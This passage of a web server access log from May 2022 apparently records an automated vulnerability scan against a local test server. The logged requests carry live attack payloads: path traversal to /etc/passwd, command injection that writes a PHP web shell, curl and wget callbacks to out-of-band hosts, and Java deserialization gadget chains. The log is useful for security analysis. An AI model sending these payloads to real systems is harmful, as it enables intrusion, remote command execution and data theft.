/asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0ArO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\x0D\x0AgetUnsavedChanges\x0D\x0ArO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAK2NhMjhmZzBzbXB2YmQzcWcwN2gwbms4cGQzb2E4cDlkZS5vYXN0LmxpdmV0AABxAH4ABXQABWh0dHBzcHh0ABlodHRwczovL3Rlc3QuamV4Ym9zcy5pbmZveA==\x0D\x0ArO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/web.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C..\x5Cadmin\x5Clogin\x5Clogin_check.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/29KD22YZTBwhgyAX9IM1c8ee8Qs\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://ca28fg0smpvbd3qg07h03fn4nzwithzhe.oast.live/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fca28fg0smpvbd3qg07h0zffz8yqd45ian.oast.live%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ca28fg0smpvbd3qg07h018dz1a75epkfa.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/server.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"192.168.144.1","http_host":"ca28fg0smpvbd3qg07h0j9aphapg9ugau.oast.live","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/24 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /b/l.e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"user_name=admin&password=admin&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fuel/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/29KD22YZTBwhgyAX9IM1c8ee8Qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:45 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) 